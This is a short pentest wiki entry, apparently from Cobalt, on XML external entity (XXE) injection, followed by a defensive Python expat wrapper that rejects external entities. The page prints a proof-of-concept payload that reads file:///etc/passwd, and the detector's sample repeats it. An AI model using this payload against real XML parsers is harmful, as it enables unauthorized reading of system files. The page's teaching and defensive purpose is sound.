Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

XXE

POC

Provide the following input as the XML content (the entity reference must sit inside the root element declared by the DOCTYPE for the document to be well-formed):

<?xml version="1.0"?> <!DOCTYPE cdl [<!ENTITY asd SYSTEM "file:///etc/passwd">]> <cdl>&asd;</cdl>

For more info, please refer to: https://blog.cobalt.io/how-to-execute-an-xml-external-entity-injection-xxe-5d5c262d5b16
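As an added, defender-side example (not Cobalt's code), the following Python stand-alone parser wrapper shows the mitigation for the probe above: it uses only the standard library's expat bindings and refuses any external DTD, any entity declared with a SYSTEM or PUBLIC identifier, and any attempt to resolve one, so no file or URL is ever fetched. The sample documents are constructed for the demonstration.

```python
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when a document declares or references an external entity."""


def parse_safely(xml_text: str) -> tuple:
    """Parse with expat, rejecting external entities; returns (root_tag, text).

    Every path by which expat could reach a file or URL (external DTD subset,
    external entity declaration, external entity reference) is hooked and
    made to raise before any I/O happens.
    """
    parser = expat.ParserCreate()
    # Never expand parameter entities: blocks external DTD subsets too.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    result = {"root": None, "text": []}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id is not None or public_id is not None:
            raise UnsafeXMLError(f"external DTD {system_id!r} not allowed")

    def on_entity_decl(name, is_pe, value, base, system_id, public_id, notation):
        if system_id is not None or public_id is not None:
            raise UnsafeXMLError(f"external entity {name!r} -> {system_id!r}")

    def on_external_ref(context, base, system_id, public_id):
        # Belt and braces: even if a declaration slipped past, never resolve it.
        raise UnsafeXMLError(f"refusing to resolve {system_id!r}")

    def on_start(tag, attrs):
        if result["root"] is None:
            result["root"] = tag

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = result["text"].append
    parser.Parse(xml_text, True)
    return result["root"], "".join(result["text"])


def is_xxe_attempt(xml_text: str) -> bool:
    """True when parse_safely rejects the document for an external-entity reason."""
    try:
        parse_safely(xml_text)
    except UnsafeXMLError:
        return True
    return False


# Constructed samples: the wiki's file:///etc/passwd probe inside its declared
# root element, and a harmless document for comparison.
XXE_SAMPLE = ('<?xml version="1.0"?>'
              '<!DOCTYPE cdl [<!ENTITY asd SYSTEM "file:///etc/passwd">]>'
              '<cdl>&asd;</cdl>')
BENIGN_SAMPLE = '<?xml version="1.0"?><cdl><name>report</name></cdl>'
```

The same hooks can be attached wherever expat is used under the hood (for example by a hardened ElementTree parser); with lxml, the equivalent is an XMLParser created with resolve_entities=False.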

Impact

High

Likelihood

High